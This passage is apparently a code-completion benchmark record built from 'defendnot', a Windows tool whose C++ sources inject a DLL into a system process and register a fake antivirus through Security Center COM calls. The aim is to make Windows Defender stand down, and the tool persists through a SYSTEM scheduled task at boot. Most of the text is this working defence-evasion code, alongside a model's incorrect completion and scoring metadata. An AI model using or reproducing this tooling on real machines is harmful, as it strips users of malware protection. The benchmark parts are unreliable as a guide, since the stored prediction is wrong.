loader::add_to_autorun(config.autorun_type));\n        } else {\n            std::println(\"** removed from autorun: {}\", loader::remove_from_autorun());\n        }\n    }\n\n    void banner(const loader::Config& config) {\n        std::println();\n        std::println(\"thanks for using {}\", strings::kProjectName);\n        std::println(\"please don't forget to leave a star at {}\", strings::kRepoUrl);\n\n        if (!config.from_autorun && config.alloc_console) {\n            system(\"pause\");\n        }\n    }\n} // namespace\n\nint main(int argc, char* argv[]) try {\n    argparse::ArgumentParser program(std::format(\"{}-loader\", strings::kProjectName), strings::kVersion.data(), argparse::default_arguments::none);\n\n    const auto fatal_print = [](const std::string_view str) -> void {\n        shared::alloc_console();\n        std::cerr << str << std::endl;\n        system(\"pause\");\n        std::exit(EXIT_FAILURE);\n    };\n\n    /// We are registering these ourselves because we have to alloc console first\n    program.add_argument(\"-h\", \"--help\")\n        .help(\"prints help message and exits\")\n        .default_value(false)\n        .implicit_value(true)\n        .action([&fatal_print, &program](const auto& /*unused*/) -> void { fatal_print(program.help().str()); });\n    program.add_argument(\"--version\")\n        .help(\"shows version and exits\")\n        .default_value(false)\n        .implicit_value(true)\n        .action([&fatal_print](const auto& /*unused*/) -> void { fatal_print(std::format(\"{}-loader v{}\", strings::kProjectName, strings::kVersion)); });\n\n    /// defendnot-loader parameters:\n    program.add_argument(\"-n\", \"--name\").help(\"av display name\").default_value(std::string(strings::kDefaultAVName)).nargs(1);\n    program.add_argument(\"-d\", \"--disable\").help(std::format(\"disable {}\", strings::kProjectName)).default_value(false).implicit_value(true);\n    program.add_argument(\"-v\", \"--verbose\").help(\"verbose logging\").default_value(false).implicit_value(true);\n    program.add_argument(\"--silent\").help(\"do not allocate console\").default_value(false).implicit_value(true);\n    program.add_argument(\"--autorun-as-user\").help(\"create autorun task as currently logged in user\").default_value(false).implicit_value(true);\n    program.add_argument(\"--disable-autorun\").help(\"disable autorun task creation\").default_value(false).implicit_value(true);\n    program.add_argument(\"--from-autorun\").hidden().default_value(false).implicit_value(true);\n\n    try {\n        program.parse_args(argc, argv);\n    } catch (std::exception& e) {\n        std::stringstream ss;\n        ss << e.what() << '\\n';\n        ss << program.help().str();\n        fatal_print(ss.str());\n        return EXIT_FAILURE;\n    }\n\n    auto config = loader::Config{\n        .name = program.get<std::string>(\"-n\"),\n        .disable = program.get<bool>(\"-d\"),\n        .alloc_console = !program.get<bool>(\"--silent\"),\n        .verbose = program.get<bool>(\"-v\"),\n        .from_autorun = program.get<bool>(\"--from-autorun\"),\n        .autorun_type = program.get<bool>(\"--autorun-as-user\") ? /// As system on boot is the default value\n                            loader::AutorunType::AS_CURRENT_USER_ON_LOGIN :\n                            loader::AutorunType::AS_SYSTEM_ON_BOOT,\n        .enable_autorun = !program.get<bool>(\"--disable-autorun\"),\n    };\n\n    /// When running from autorun, we'll be missing all the cli arguments, so lets load some relevant ones\n    if (config.from_autorun) {\n        shared::ctx.deserialize();\n        config.verbose = shared::ctx.verbose;\n    }\n\n    if (!config.alloc_console && config.verbose) {\n        fatal_print(\"--silent flag can not be used in combination with --verbose\");\n    }\n\n    setup_window(config);\n    loader::ensure_environment();\n\n    setup_context(config);\n\n    /// \\todo @es3n1n: move this to a separate function and add move ctor for ipc\n    std::println(\"** setting up ipc\");\n    auto ipc = shared::InterProcessCommunication(shared::InterProcessCommunicationMode::READ_WRITE, true);\n    ipc->finished = false;\n\n    const auto process = load_defendnot();\n    defer->void {\n        TerminateProcess(process, 0);\n    };\n\n    wait_for_finish(ipc);\n\n    /// Only create autorun task when not running from autorun, no need to recreate it because we're missing some config vars\n    if (!config.from_autorun) {\n        process_autorun(config);\n    }\n\n    banner(config);\n\n    return EXIT_SUCCESS;\n} catch (std::exception& err) {\n    shared::alloc_console();\n    std::println(stderr, \"** fatal error: {}\", err.what());\n    system(\"pause\");\n    return EXIT_FAILURE;\n}\n\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, int nCmdShow) {\n    return main(__argc, __argv);\n}\n"], ["/defendnot/wsc-binary-check/main.cpp", "#include <Windows.h>\n#include <winternl.h>\n\n#include <filesystem>\n#include <fstream>\n#include <optional>\n#include <print>\n#include <ranges>\n#include <set>\n\n#include \"shared/defer.hpp\"\n\n#pragma comment(lib, \"Crypt32.lib\")\n\nnamespace {\n    constexpr std::string_view kTargetDirectory = \"c:\\\\Windows\\\\System32\";\n    /* constexpr */ auto kTargetFileExts = std::set<std::string_view>{\".exe\"};\n\n    constexpr std::uint16_t kDosMagic = 0x5A4D;\n    constexpr std::uint32_t kNtSignature = 0x00004550;\n    constexpr std::uint16_t kARM64Machine = 0xAA64;\n    constexpr std::uint16_t kAMD64Machine = 0x8664;\n    constexpr std::uint16_t kI386Machine = 0x014C;\n    constexpr std::uint16_t kDllCharacteristicsForceIntegrityMask = 0x80;\n\n    [[nodiscard]] std::optional<std::vector<std::uint8_t>> read_file(const std::filesystem::path path) {\n        std::ifstream file(path, std::ios::binary);\n        if (!file.good()) {\n            return std::nullopt;\n        }\n\n        const auto size = std::filesystem::file_size(path);\n        std::vector<std::uint8_t> buffer(size);\n\n        file.read(reinterpret_cast<char*>(buffer.data()), static_cast<std::streamsize>(buffer.size()));\n        return buffer;\n    }\n\n    [[nodiscard]] bool check_characteristics(const std::span<std::uint8_t> data) {\n        if (data.size() < sizeof(IMAGE_DOS_HEADER)) {\n            throw std::runtime_error(\"got invalid pe image\");\n        }\n\n        const auto p_dos = reinterpret_cast<PIMAGE_DOS_HEADER>(data.data());\n        if (p_dos->e_magic != kDosMagic) {\n            throw std::runtime_error(\"got invalid pe image (2)\");\n        }\n\n        const auto p_nt = reinterpret_cast<PIMAGE_NT_HEADERS>(data.data() + p_dos->e_lfanew);\n        if (p_nt->Signature != kNtSignature) {\n            throw std::runtime_error(\"got invalid pe image (3)\");\n        }\n\n        const auto machine = p_nt->FileHeader.Machine;\n        std::uint16_t characteristics;\n\n        if (machine == kARM64Machine || machine == kAMD64Machine) {\n            characteristics = reinterpret_cast<PIMAGE_NT_HEADERS64>(p_nt)->OptionalHeader.DllCharacteristics;\n        } else if (machine == kI386Machine) {\n            characteristics = reinterpret_cast<PIMAGE_NT_HEADERS32>(p_nt)->OptionalHeader.DllCharacteristics;\n        } else {\n            throw std::runtime_error(std::format(\"unsupported machine: {:#x}\", machine));\n        }\n\n        return (characteristics & kDllCharacteristicsForceIntegrityMask) != 0;\n    }\n\n    [[nodiscard]] bool check_signature(const std::filesystem::path path) {\n        HCERTSTORE store = {0};\n        HCRYPTMSG msg = {0};\n        if (!CryptQueryObject(1, path.wstring().c_str(), 0x400, 0xE, 0, nullptr, nullptr, nullptr, &store, &msg, nullptr) //\n            || !store || !msg) {\n            /// Most likely the binary is just not signed\n            return false;\n        }\n\n        defer->void {\n            CryptMsgClose(msg);\n            CertCloseStore(store, 1);\n        };\n\n        PCCERT_CONTEXT signer = nullptr;\n        if (!CryptMsgGetAndVerifySigner(msg, 0, nullptr, 2, &signer, nullptr) || signer == nullptr) {\n            throw std::runtime_error(std::format(\"CryptMsgGetAndVerifySigner() on {}\", path.string()));\n        }\n\n        defer->void {\n            CertFreeCertificateContext(signer);\n        };\n\n        /// I don't think we have to do something with signer?\n        return true;\n    }\n} // namespace\n\nint main() try {\n    for (auto& entry : std::filesystem::recursive_directory_iterator(kTargetDirectory, std::filesystem::directory_options::skip_permission_denied)) {\n        auto path = entry.path();\n        auto ext = path.extension().string() //\n                   | std::views::transform([](const char c) -> char { return ::tolower(c); }) //\n                   | std::ranges::to<std::string>();\n\n        if (!kTargetFileExts.contains(ext)) {\n            continue;\n        }\n\n        auto file = read_file(path);\n        if (!file.has_value()) {\n            std::println(stderr, \"unable to read {}\", path.string());\n            continue;\n        }\n\n        const std::span file_ptr = *file;\n        if (!check_characteristics(file_ptr)) {\n            continue;\n        }\n\n        if (!check_signature(path)) {\n            continue;\n        }\n\n        std::println(\"matches: {}\", path.string());\n    }\n\n    return EXIT_SUCCESS;\n} catch (const std::exception& e) {\n    std::println(stderr, \"fatal error: {}\", e.what());\n    return EXIT_FAILURE;\n}\n"], ["/defendnot/defendnot-loader/core/autorun.cpp", "#include \"core/core.hpp\"\n\n#include \"shared/com.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/strings.hpp\"\n\n#include <memory>\n#include <print>\n#include <stdexcept>\n#include <type_traits>\n\n#include <comdef.h>\n#include <taskschd.h>\n\n#pragma comment(lib, \"taskschd.lib\")\n#pragma comment(lib, \"comsupp.lib\")\n#pragma comment(lib, \"ole32.lib\")\n\nnamespace loader {\n    namespace {\n        constexpr std::string_view kTaskName = strings::kProjectName;\n\n        void co_initialize() {\n            static std::once_flag fl;\n            std::call_once(fl, []() -> void {\n                const auto result = CoInitializeEx(nullptr, COINIT_MULTITHREADED);\n\n                if (FAILED(result)) {\n                    throw std::runtime_error(\"failed to CoInitializeEx\");\n                }\n            });\n        }\n\n        template <typename Callable>\n        [[nodiscard]] bool with_service(Callable&& callback) {\n            co_initialize();\n\n            com::Ptr<ITaskService> service;\n            auto hr =\n                CoCreateInstance(CLSID_TaskScheduler, nullptr, CLSCTX_INPROC_SERVER, IID_ITaskService, reinterpret_cast<void**>(service.ref_to_ptr()));\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            hr = service->Connect(VARIANT{}, VARIANT{}, VARIANT{}, VARIANT{});\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITaskFolder> root_folder;\n            hr = service->GetFolder(BSTR(L\"\\\\\"), root_folder.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            /// Cleanup our task, we will recreate it in the callback if needed\n            root_folder->DeleteTask(BSTR(kTaskName.data()), 0);\n            return callback(service.get(), root_folder.get());\n        }\n    } // namespace\n\n    [[nodiscard]] bool add_to_autorun(AutorunType type) {\n        const auto bin_path = shared::get_this_module_path();\n\n        return with_service([bin_path, type](ITaskService* service, ITaskFolder* folder) -> bool {\n            /// Deduce the autorun config based on type\n            const auto task_trigger = type == AutorunType::AS_SYSTEM_ON_BOOT ? TASK_TRIGGER_BOOT : TASK_TRIGGER_LOGON;\n            const auto logon_type = type == AutorunType::AS_SYSTEM_ON_BOOT ? TASK_LOGON_SERVICE_ACCOUNT : TASK_LOGON_INTERACTIVE_TOKEN;\n\n            BSTR user_id = nullptr;\n            auto bstr_sys = bstr_t(L\"SYSTEM\");\n            if (type == AutorunType::AS_SYSTEM_ON_BOOT) {\n                user_id = bstr_sys;\n            }\n\n            com::Ptr<ITaskDefinition> task;\n            auto hr = service->NewTask(0, task.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IRegistrationInfo> reg_info;\n            hr = task->get_RegistrationInfo(reg_info.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IPrincipal> principal;\n            hr = task->get_Principal(principal.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITriggerCollection> trigger_collection;\n            hr = task->get_Triggers(trigger_collection.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITrigger> trigger;\n            hr = trigger_collection->Create(task_trigger, trigger.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IActionCollection> action_collection;\n            hr = task->get_Actions(action_collection.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IAction> action;\n            hr = action_collection->Create(TASK_ACTION_EXEC, action.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IExecAction> exec_action;\n            hr = action->QueryInterface(IID_IExecAction, reinterpret_cast<void**>(exec_action.ref_to_ptr()));\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITaskSettings> settings;\n            hr = task->get_Settings(settings.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            /// Elevated, when system boots\n            principal->put_UserId(user_id);\n            principal->put_LogonType(logon_type);\n            principal->put_RunLevel(TASK_RUNLEVEL_HIGHEST);\n\n            /// Info\n            reg_info->put_Author(bstr_t(strings::kRepoUrl.data()));\n\n            /// Start even if we're on batteries\n            settings->put_DisallowStartIfOnBatteries(VARIANT_FALSE);\n            settings->put_StopIfGoingOnBatteries(VARIANT_FALSE);\n\n            /// Binary\n            exec_action->put_Path(bstr_t(bin_path.string().c_str()));\n            exec_action->put_Arguments(bstr_t(\"--from-autorun\"));\n\n            /// Register the task and we are done\n            com::Ptr<IRegisteredTask> registered_task;\n            hr = folder->RegisterTaskDefinition(bstr_t(kTaskName.data()), task.get(), TASK_CREATE_OR_UPDATE, VARIANT{}, VARIANT{}, TASK_LOGON_NONE,\n                                                variant_t(L\"\"), registered_task.ref_to_ptr());\n            return SUCCEEDED(hr);\n        });\n    }\n\n    [[nodiscard]] bool remove_from_autorun() {\n        return with_service([]<typename... TArgs>(TArgs...) -> bool { return true; });\n    }\n} // namespace loader\n"], ["/defendnot/defendnot/bootstrap/bootstrap.cpp", "#include \"bootstrap.hpp\"\n#include \"core/com.hpp\"\n#include \"core/log.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/defer.hpp\"\n\n#include <Windows.h>\n\nnamespace defendnot {\n    namespace {\n        template <com::ComObject Ty>\n        void apply(const std::string_view log_prefix, const BSTR name) {\n            /// Get the WSC interface\n            auto inst = com::query<Ty>();\n\n            /// This can fail if we dont have any products registered so no com_checked\n            logln(\"{}_unregister: {:#x}\", log_prefix, com::retry_while_pending([&inst]() -> HRESULT { return inst->Unregister(); }) & 0xFFFFFFFF);\n            if (shared::ctx.state == shared::State::OFF) {\n                return;\n            }\n\n            /// Register and activate\n            logln(\"{}_register: {:#x}\", log_prefix, com::checked(inst->Register(name, name, 0, 0)));\n            logln(\"{}_update: {:#x}\", log_prefix, com::checked(inst->UpdateStatus(WSCSecurityProductState::ON, static_cast<BOOL>(true))));\n\n            /// Update the substatuses, if the interface supports this\n            if constexpr (std::is_same_v<Ty, IWscAVStatus4>) {\n                logln(\"{}_scan_update: {:#x}\", log_prefix, com::checked(inst->UpdateScanSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n                logln(\"{}_settings_update: {:#x}\", log_prefix, com::checked(inst->UpdateSettingsSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n                logln(\"{}_prot_update: {:#x}\", log_prefix, com::checked(inst->UpdateProtectionUpdateSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n            }\n        }\n    } // namespace\n\n    void startup() {\n        /// Setup\n        shared::ctx.deserialize();\n        logln(\"init: {:#x}\", com::checked(CoInitialize(nullptr)));\n\n        /// WSC will reject the register request if name is empty\n        auto name_w = std::wstring(shared::ctx.name.begin(), shared::ctx.name.end());\n        if (name_w.empty()) {\n            throw std::runtime_error(\"AV Name can not be empty!\");\n        }\n\n        /// Convert to BSTR\n        auto name = SysAllocString(name_w.c_str());\n        defer->void {\n            SysFreeString(name);\n        };\n\n        /// Register our stuff in the WSC interfaces\n        apply<IWscASStatus>(\"IWscASStatus\", name);\n        apply<IWscAVStatus4>(\"IWscAVStatus4\", name);\n    }\n} // namespace defendnot\n"], ["/defendnot/defendnot-loader/core/ensure_environment.cpp", "#include \"core/core.hpp\"\n#include \"shared/strings.hpp\"\n#include \"util/scm.hpp\"\n\n#include <format>\n#include <print>\n#include <stdexcept>\n\nnamespace loader {\n    void ensure_environment() {\n        auto manager = scm::Manager();\n        if (!manager.valid()) [[unlikely]] {\n            throw std::runtime_error(\"Unable to open scm::Manager\");\n        }\n\n        auto service = manager.get_service(L\"wscsvc\");\n        if (!service.valid() || !service.query_status()) {\n            throw std::runtime_error(std::format(\"{}\\nOpen error: {}\", strings::wsc_unavailable_error().data(), GetLastError()));\n        }\n\n        if (service.state() == scm::ServiceState::RUNNING) {\n            /// Wsc service has been already started, no need to start it ourselves\n            return;\n        }\n\n        /// Let's start the service ourselves\n        std::println(\"** wscsvc is not running, starting it..\");\n        if (!service.start()) {\n            throw std::runtime_error(std::format(\"{}\\nTried to start the service, but go an error: {}\", strings::wsc_unavailable_error(), GetLastError()));\n        }\n\n        std::println(\"** successfully started the service, waiting for it to get up..\");\n        while (true) {\n            if (!service.query_status(/*force=*/true)) {\n                throw std::runtime_error(\n                    std::format(\"{}\\nStarted the service, got an error while querying: {}\", strings::wsc_unavailable_error(), GetLastError()));\n            }\n\n            if (const auto state = service.state(); state == scm::ServiceState::RUNNING) {\n                std::println(\"** we are good to go\");\n                return;\n            }\n\n            std::this_thread::sleep_for(std::chrono::milliseconds(500));\n        }\n    }\n} // namespace loader\n"]], "task_instance_info": {"created_time": "2025-08-20 19:54:27", "created_task_model": "DeepSeek-R1", "function_skeleton": "void entry_thread(HMODULE base) {}", "code_description": "This code segment functions to: Initialize inter-process communication channels, execute a startup sequence with error handling, propagate operation status through shared resources, and manage thread termination with resource cleanup."}, "inference_content": {"inference_model": "DeepSeek-R1", "inference_result": "```cpp\n[TASK_BEGIN]\nvoid entry_thread(HMODULE base) {\n    Bootstrap::init();\n    \n    try {\n        core::log_init();\n        shared::ipc::main_loop();\n    }\n    catch (const std::exception& e) {\n        LOG_ERROR(\"Unhandled exception: {}\", e.what());\n    }\n    __finally {\n        Bootstrap::shutdown();\n        FreeLibraryAndExitThread(base, 0);\n    }\n}\n[TASK_END]\n```", "inference_time": "2025-08-20 19-54-43"}, "editdistance_info": {"edit_distance": 25.0, "calculate_time": "2025-08-20 19:54:43", "true_code_clean": "void entry_thread(HMODULE base) {\n        bool success = false;\n        std::unique_ptr<shared::InterProcessCommunication> ipc;\n        try {\n            ipc = std::make_unique<shared::InterProcessCommunication>(shared::InterProcessCommunicationMode::WRITE);\n            defendnot::startup();\n            success = true;\n        } catch (std::exception& err) {\n            MessageBoxA(nullptr, err.what(), \"defendnot\", MB_TOPMOST | MB_ICONERROR);\n        }\n        if (ipc) {\n            (*ipc)->success = success;\n            (*ipc)->finished = true;\n        }\n        FreeLibraryAndExitThread(base, 0);\n    }", "predict_code_clean": "void entry_thread(HMODULE base) {\n    Bootstrap::init();\n    try {\n        core::log_init();\n        shared::ipc::main_loop();\n    }\n    catch (const std::exception& e) {\n        LOG_ERROR(\"Unhandled exception: {}\", e.what());\n    }\n    __finally {\n        Bootstrap::shutdown();\n        FreeLibraryAndExitThread(base, 0);\n    }\n}"}}
{"repo_name": "defendnot", "file_name": "/defendnot/defendnot/bootstrap/bootstrap.cpp", "inference_info": {"prefix_code": "#include \"bootstrap.hpp\"\n#include \"core/com.hpp\"\n#include \"core/log.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/defer.hpp\"\n\n#include <Windows.h>\n\nnamespace defendnot {\n    namespace {\n        template <com::ComObject Ty>\n        ", "suffix_code": "\n    } // namespace\n\n    void startup() {\n        /// Setup\n        shared::ctx.deserialize();\n        logln(\"init: {:#x}\", com::checked(CoInitialize(nullptr)));\n\n        /// WSC will reject the register request if name is empty\n        auto name_w = std::wstring(shared::ctx.name.begin(), shared::ctx.name.end());\n        if (name_w.empty()) {\n            throw std::runtime_error(\"AV Name can not be empty!\");\n        }\n\n        /// Convert to BSTR\n        auto name = SysAllocString(name_w.c_str());\n        defer->void {\n            SysFreeString(name);\n        };\n\n        /// Register our stuff in the WSC interfaces\n        apply<IWscASStatus>(\"IWscASStatus\", name);\n        apply<IWscAVStatus4>(\"IWscAVStatus4\", name);\n    }\n} // namespace defendnot\n", "middle_code": "void apply(const std::string_view log_prefix, const BSTR name) {\n            auto inst = com::query<Ty>();\n            logln(\"{}_unregister: {:#x}\", log_prefix, com::retry_while_pending([&inst]() -> HRESULT { return inst->Unregister(); }) & 0xFFFFFFFF);\n            if (shared::ctx.state == shared::State::OFF) {\n                return;\n            }\n            logln(\"{}_register: {:#x}\", log_prefix, com::checked(inst->Register(name, name, 0, 0)));\n            logln(\"{}_update: {:#x}\", log_prefix, com::checked(inst->UpdateStatus(WSCSecurityProductState::ON, static_cast<BOOL>(true))));\n            if constexpr (std::is_same_v<Ty, IWscAVStatus4>) {\n                logln(\"{}_scan_update: {:#x}\", log_prefix, com::checked(inst->UpdateScanSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n                logln(\"{}_settings_update: {:#x}\", log_prefix, com::checked(inst->UpdateSettingsSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n                logln(\"{}_prot_update: {:#x}\", log_prefix, com::checked(inst->UpdateProtectionUpdateSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n            }\n        }", "code_description": null, "fill_type": "FUNCTION_TYPE", "language_type": "cpp", "sub_task_type": null}, "context_code": [["/defendnot/defendnot-loader/core/autorun.cpp", "#include \"core/core.hpp\"\n\n#include \"shared/com.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/strings.hpp\"\n\n#include <memory>\n#include <print>\n#include <stdexcept>\n#include <type_traits>\n\n#include <comdef.h>\n#include <taskschd.h>\n\n#pragma comment(lib, \"taskschd.lib\")\n#pragma comment(lib, \"comsupp.lib\")\n#pragma comment(lib, \"ole32.lib\")\n\nnamespace loader {\n    namespace {\n        constexpr std::string_view kTaskName = strings::kProjectName;\n\n        void co_initialize() {\n            static std::once_flag fl;\n            std::call_once(fl, []() -> void {\n                const auto result = CoInitializeEx(nullptr, COINIT_MULTITHREADED);\n\n                if (FAILED(result)) {\n                    throw std::runtime_error(\"failed to CoInitializeEx\");\n                }\n            });\n        }\n\n        template <typename Callable>\n        [[nodiscard]] bool with_service(Callable&& callback) {\n            co_initialize();\n\n            com::Ptr<ITaskService> service;\n            auto hr =\n                CoCreateInstance(CLSID_TaskScheduler, nullptr, CLSCTX_INPROC_SERVER, IID_ITaskService, reinterpret_cast<void**>(service.ref_to_ptr()));\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            hr = service->Connect(VARIANT{}, VARIANT{}, VARIANT{}, VARIANT{});\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITaskFolder> root_folder;\n            hr = service->GetFolder(BSTR(L\"\\\\\"), root_folder.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            /// Cleanup our task, we will recreate it in the callback if needed\n            root_folder->DeleteTask(BSTR(kTaskName.data()), 0);\n            return callback(service.get(), root_folder.get());\n        }\n    } // namespace\n\n    [[nodiscard]] bool add_to_autorun(AutorunType type) {\n        const auto bin_path = shared::get_this_module_path();\n\n        return with_service([bin_path, type](ITaskService* service, ITaskFolder* folder) -> bool {\n            /// Deduce the autorun config based on type\n            const auto task_trigger = type == AutorunType::AS_SYSTEM_ON_BOOT ? TASK_TRIGGER_BOOT : TASK_TRIGGER_LOGON;\n            const auto logon_type = type == AutorunType::AS_SYSTEM_ON_BOOT ? TASK_LOGON_SERVICE_ACCOUNT : TASK_LOGON_INTERACTIVE_TOKEN;\n\n            BSTR user_id = nullptr;\n            auto bstr_sys = bstr_t(L\"SYSTEM\");\n            if (type == AutorunType::AS_SYSTEM_ON_BOOT) {\n                user_id = bstr_sys;\n            }\n\n            com::Ptr<ITaskDefinition> task;\n            auto hr = service->NewTask(0, task.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IRegistrationInfo> reg_info;\n            hr = task->get_RegistrationInfo(reg_info.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IPrincipal> principal;\n            hr = task->get_Principal(principal.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITriggerCollection> trigger_collection;\n            hr = task->get_Triggers(trigger_collection.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITrigger> trigger;\n            hr = trigger_collection->Create(task_trigger, trigger.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IActionCollection> action_collection;\n            hr = task->get_Actions(action_collection.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IAction> action;\n            hr = action_collection->Create(TASK_ACTION_EXEC, action.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IExecAction> exec_action;\n            hr = action->QueryInterface(IID_IExecAction, reinterpret_cast<void**>(exec_action.ref_to_ptr()));\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITaskSettings> settings;\n            hr = task->get_Settings(settings.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            /// Elevated, when system boots\n            principal->put_UserId(user_id);\n            principal->put_LogonType(logon_type);\n            principal->put_RunLevel(TASK_RUNLEVEL_HIGHEST);\n\n            /// Info\n            reg_info->put_Author(bstr_t(strings::kRepoUrl.data()));\n\n            /// Start even if we're on batteries\n            settings->put_DisallowStartIfOnBatteries(VARIANT_FALSE);\n            settings->put_StopIfGoingOnBatteries(VARIANT_FALSE);\n\n            /// Binary\n            exec_action->put_Path(bstr_t(bin_path.string().c_str()));\n            exec_action->put_Arguments(bstr_t(\"--from-autorun\"));\n\n            /// Register the task and we are done\n            com::Ptr<IRegisteredTask> registered_task;\n            hr = folder->RegisterTaskDefinition(bstr_t(kTaskName.data()), task.get(), TASK_CREATE_OR_UPDATE, VARIANT{}, VARIANT{}, TASK_LOGON_NONE,\n                                                variant_t(L\"\"), registered_task.ref_to_ptr());\n            return SUCCEEDED(hr);\n        });\n    }\n\n    [[nodiscard]] bool remove_from_autorun() {\n        return with_service([]<typename... TArgs>(TArgs...) -> bool { return true; });\n    }\n} // namespace loader\n"], ["/defendnot/defendnot-loader/main.cpp", "#include \"core/core.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/defer.hpp\"\n#include \"shared/ipc.hpp\"\n#include \"shared/strings.hpp\"\n#include <argparse/argparse.hpp>\n\n#include <format>\n#include <print>\n#include <thread>\n\nnamespace {\n    void setup_window(const loader::Config& config) {\n        if ((!config.from_autorun || config.verbose) && config.alloc_console) {\n            shared::alloc_console();\n        }\n    }\n\n    void setup_context(const loader::Config& config) {\n        std::println(\"** setting up context\");\n\n        if (config.name.length() > shared::kMaxNameLength) {\n            throw std::runtime_error(std::format(\"Max name length is {} characters\", shared::kMaxNameLength));\n        }\n\n        shared::ctx.state = config.disable ? shared::State::OFF : shared::State::ON;\n        shared::ctx.verbose = config.verbose;\n        std::ranges::copy(config.name, shared::ctx.name.data());\n\n        /// No need to overwrite ctx if we are called from autorun\n        if (!config.from_autorun) {\n            std::println(\"** overwriting ctx.bin\");\n            shared::ctx.serialize();\n        }\n    }\n\n    [[nodiscard]] HANDLE load_defendnot() {\n        std::println(\"** loading defendnot\");\n\n        auto dll_path = shared::get_this_module_path().parent_path();\n        dll_path /= strings::kDllName;\n        if (!std::filesystem::exists(dll_path)) {\n            throw std::runtime_error(std::format(\"{} does not exist!\", strings::kDllName));\n        }\n\n        return loader::inject(dll_path.string(), strings::kVictimProcess);\n    }\n\n    void wait_for_finish(shared::InterProcessCommunication& ipc) {\n        std::println(\"** waiting for process to finish, this can take a while\");\n        std::cout << std::flush;\n        while (!ipc->finished) {\n            std::this_thread::sleep_for(std::chrono::milliseconds(500));\n        }\n        std::println(\"** success: {}\", ipc->success);\n    }\n\n    void process_autorun(const loader::Config& config) {\n        if (shared::ctx.state == shared::State::ON && config.enable_autorun) {\n            std::println(\"** added to autorun: {}\", loader::add_to_autorun(config.autorun_type));\n        } else {\n            std::println(\"** removed from autorun: {}\", loader::remove_from_autorun());\n        }\n    }\n\n    void banner(const loader::Config& config) {\n        std::println();\n        std::println(\"thanks for using {}\", strings::kProjectName);\n        std::println(\"please don't forget to leave a star at {}\", strings::kRepoUrl);\n\n        if (!config.from_autorun && config.alloc_console) {\n            system(\"pause\");\n        }\n    }\n} // namespace\n\nint main(int argc, char* argv[]) try {\n    argparse::ArgumentParser program(std::format(\"{}-loader\", strings::kProjectName), strings::kVersion.data(), argparse::default_arguments::none);\n\n    const auto fatal_print = [](const std::string_view str) -> void {\n        shared::alloc_console();\n        std::cerr << str << std::endl;\n        system(\"pause\");\n        std::exit(EXIT_FAILURE);\n    };\n\n    /// We are registering these ourselves because we have to alloc console first\n    program.add_argument(\"-h\", \"--help\")\n        .help(\"prints help message and exits\")\n        .default_value(false)\n        .implicit_value(true)\n        .action([&fatal_print, &program](const auto& /*unused*/) -> void { fatal_print(program.help().str()); });\n    program.add_argument(\"--version\")\n        .help(\"shows version and exits\")\n        .default_value(false)\n        .implicit_value(true)\n        .action([&fatal_print](const auto& /*unused*/) -> void { fatal_print(std::format(\"{}-loader v{}\", strings::kProjectName, strings::kVersion)); });\n\n    /// defendnot-loader parameters:\n    program.add_argument(\"-n\", \"--name\").help(\"av display name\").default_value(std::string(strings::kDefaultAVName)).nargs(1);\n    program.add_argument(\"-d\", \"--disable\").help(std::format(\"disable {}\", strings::kProjectName)).default_value(false).implicit_value(true);\n    program.add_argument(\"-v\", \"--verbose\").help(\"verbose logging\").default_value(false).implicit_value(true);\n    program.add_argument(\"--silent\").help(\"do not allocate console\").default_value(false).implicit_value(true);\n    program.add_argument(\"--autorun-as-user\").help(\"create autorun task as currently logged in user\").default_value(false).implicit_value(true);\n    program.add_argument(\"--disable-autorun\").help(\"disable autorun task creation\").default_value(false).implicit_value(true);\n    program.add_argument(\"--from-autorun\").hidden().default_value(false).implicit_value(true);\n\n    try {\n        program.parse_args(argc, argv);\n    } catch (std::exception& e) {\n        std::stringstream ss;\n        ss << e.what() << '\\n';\n        ss << program.help().str();\n        fatal_print(ss.str());\n        return EXIT_FAILURE;\n    }\n\n    auto config = loader::Config{\n        .name = program.get<std::string>(\"-n\"),\n        .disable = program.get<bool>(\"-d\"),\n        